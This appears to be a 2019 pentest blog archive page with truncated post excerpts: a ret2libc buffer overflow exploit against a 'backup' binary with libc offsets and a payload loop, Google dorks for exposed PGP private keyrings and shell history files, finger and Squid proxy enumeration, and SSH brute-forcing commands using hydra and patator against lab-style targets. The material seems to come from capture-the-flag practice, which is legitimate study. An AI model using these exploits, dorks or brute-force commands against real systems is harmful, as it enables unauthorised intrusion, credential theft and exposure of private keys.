
Posts

Showing posts from August, 2019

Buffer Over Flow Exploitation

Check if there is a Buffer Over Flow Vuln:
ldd /usr/bin/filename | grep libc
libc.so.6 => /lib32/libc.so.6 (0xf75df000)
Get The value of System:
readelf -s /lib32/libc.so.6 | grep system
245: 00110820 68 FUNC svcerr_systemerr@@GLIBC_2.0
627: 0003a940 55 FUNC _libc_system@@GLIBC_PRIVATE
1457: 0003a940 55 FUNC system@@GLIBC_2.0
we need the value of system@@GLIBC_2.0 "0003a940"
Get The value of Exit:
readelf -s /lib32/libc.so.6 | grep exit
2263: 0002e7d0 78 FUNC on_exit@@GLIBC_2.0
Get The value of /bin/sh in libc:
strings -a -t x /lib32/libc.so.6 | grep /bin/sh
15900b /bin/sh
while true; do /usr/local/bin/backup -i $(python -c 'print "A" * 512 + "\x40\xa9\x03\x00\xb0\xe7\x02\x00\x0b\x90\x15\x00"'); done
IPPSEC Buffer Overflow Exploit Code:
from subprocess import call
import struct
libc_base_addr = 0xf75b000
system_off=0x0003a940 #system offset
exit_off=0x0002e7d0 #exit offset
a...

Reconnaissance

Google Enum
#Finding PGP and GnuPG Private Key rings
site:domain.com intitle:index.of intext:"secring.skr"| "secring.pgp" | "secring.bak"
#Shell History files in interesting domains
site:domain.com intitle:index.of bash_history
#Nessus Scan Results
intitle:"Nessus Scan Report" "This file was generated by Nessus"
SearchDiggity GUI tool
Finger Enumeration
Finger Enum Script
finger @10.10.10.76
perl finger-user-enum.pl -U ../../SecLists/Usernames/Names/names.txt -t 10.10.10.76
finger root@10.10.10.76
Enumerating Squid Proxy
nikto -h 10.10.10.10 -useproxy http://10.10.10.10:3128
get /etc/squid/squid.conf
get /etc/squid/squid.cgf
get /etc/squid/squid.config
Set a profile in foxy proxy to change to the squid proxy and add creds in it to access it properly.
Burp Settings: add upstream proxy --> destination: * host : IP_ADDRESS port : 3128 Authentication type: Basic Username: creds Password: creds
Set foxyproxy to use b...

Brute Force a SSH Password and Username

Creating a Wordlist based on keywords from a page
cewl 10.10.10.46 > wordlist.txt --> Create a word list based on the files/words/links available in the web page
Brute Force SSH:
patator ssh_login host=10.10.10.76 port=22 user=someone password=FILE0 0=probable-v2-top1575.txt persistent=0
https://github.com/lanjelot/patator.git
Brute Force SSH Password or Username:
hydra -L /usr/share/wordlists/rockyou.txt -P /usr/share/wordlists/rockyou.txt -M Documents/ip.txt -t 4 ssh
hydra -l root -P /usr/share/wordlists/rockyou.txt 192.168.1.105 -t 4 ssh
hydra -l root -P /usr/share/wordlists/rockyou.txt 192.168.1.105 -t 4 -e nsr ssh
-t = Number of threads used
-P = Wordlist for passwords
-L = Wordlist for usernames
-p = Password
-l = Username
-M = List of targets
-s = Change the SSH port to test
-e = More ways to test; n = null; s = same; r = reverse; nsr checks for same username and pass, null pass and reverse of the username
Brute force any Server, Port:
ht...